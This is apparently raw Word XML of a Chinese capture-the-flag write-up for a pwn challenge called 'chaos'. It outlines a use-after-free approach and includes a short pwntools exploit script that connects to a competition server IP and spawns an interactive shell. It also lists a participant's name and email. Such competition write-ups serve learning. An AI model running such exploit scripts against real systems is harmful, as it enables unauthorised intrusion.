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245AB025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="005C7C48" w:rsidRPr="00C346CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF4043" w14:textId="51E9FB37" w:rsidR="00AF064E" w:rsidRDefault="00AC4A10" w:rsidP="00AF064E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>AkyOI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF064E" w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>李承达</w:t>
      </w:r>
      <w:r w:rsidR="00AF064E" w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3433778745@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DFA74" w14:textId="303786A2" w:rsidR="00AF064E" w:rsidRDefault="00AC4A10" w:rsidP="001043FF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PWN</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chaos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="3D03916B" w:rsidR="00AF064E" w:rsidRPr="00AF064E" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路（</w:t>
      </w:r>
      <w:r w:rsidR="001043FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文字说明+截图）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03034674" w14:textId="43D38965" w:rsidR="00AF064E" w:rsidRDefault="00AC4A10" w:rsidP="00AE0B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选项5中的UAF漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DA49B6" w14:textId="165661C6" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AE0BCD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AA8CA8" wp14:editId="1F778103">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>83820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>88900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4639310" cy="3620135"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="28654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62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ACC6" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="0E56CB01" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="217CC881" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="5CDAE541" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="2D01C0EA" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="7765F00A" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="24DE1503" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="786C54D1" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="3D6FEF84" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="0066943B" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="1C7B1040" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="6C61B890" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="1B937439" w14:textId="77777777" w:rsidR="00AE0BCD" w:rsidRDefault="00AE0BCD" w:rsidP="00AF064E"/>
    <w:p w14:paraId="4B2A27D5" w14:textId="7BF25AD4" w:rsidR="00AF064E" w:rsidRDefault="00AF064E" w:rsidP="00AF064E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC4A10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改chunk</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AC4A10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容位</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AC4A10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D08D6C" w14:textId="3886CA7E" w:rsidR="00AF064E" w:rsidRDefault="00AF064E" w:rsidP="00AF064E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC4A10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79878D88" w14:textId="3C9E1014" w:rsidR="00AF064E" w:rsidRPr="006D7CD7" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="006D7CD7">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp（如有，请粘贴完整代码，不允许截图！）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FAA7D0" w14:textId="77777777" w:rsidR="00AC4A10" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2304ACBB" w14:textId="77777777" w:rsidR="00AC4A10" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Crypto.Util.number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>long_to_bytes,bytes_to_long</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0563576E" w14:textId="77777777" w:rsidR="00AC4A10" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>context.log_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1DD41A" w14:textId="77777777" w:rsidR="00AC4A10" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:r>
        <w:t>context(arch='amd64</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>',os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465ECBAD" w14:textId="77777777" w:rsidR="00AC4A10" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>context.terminal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>','</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>splitw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>','-h']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB88AB5" w14:textId="77777777" w:rsidR="00AC4A10" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE19F1" w14:textId="77777777" w:rsidR="00AC4A10" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:r>
        <w:t>p=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'182.92.237.102',10004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11262ABD" w14:textId="77777777" w:rsidR="00AC4A10" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("Please Choice:","5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004255A1" w14:textId="77777777" w:rsidR="00AC4A10" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>p.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("Please Input Chunk size :","104")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBA11D" w14:textId="77777777" w:rsidR="00AC4A10" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("Please Input Content :","Flag")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A01A4B" w14:textId="03C07BAE" w:rsidR="00EA3779" w:rsidRPr="00EA3779" w:rsidRDefault="00AC4A10" w:rsidP="00AC4A10">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p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B188A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EE6C63C"/>
    <w:lvl w:ilvl="0" w:tplc="53C41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1478548">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="16255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1043FF"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="005C7C48"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="00AC4A10"/>
    <w:rsid w:val="00AE0BCD"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00C346CE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承达 李</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-01T07:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>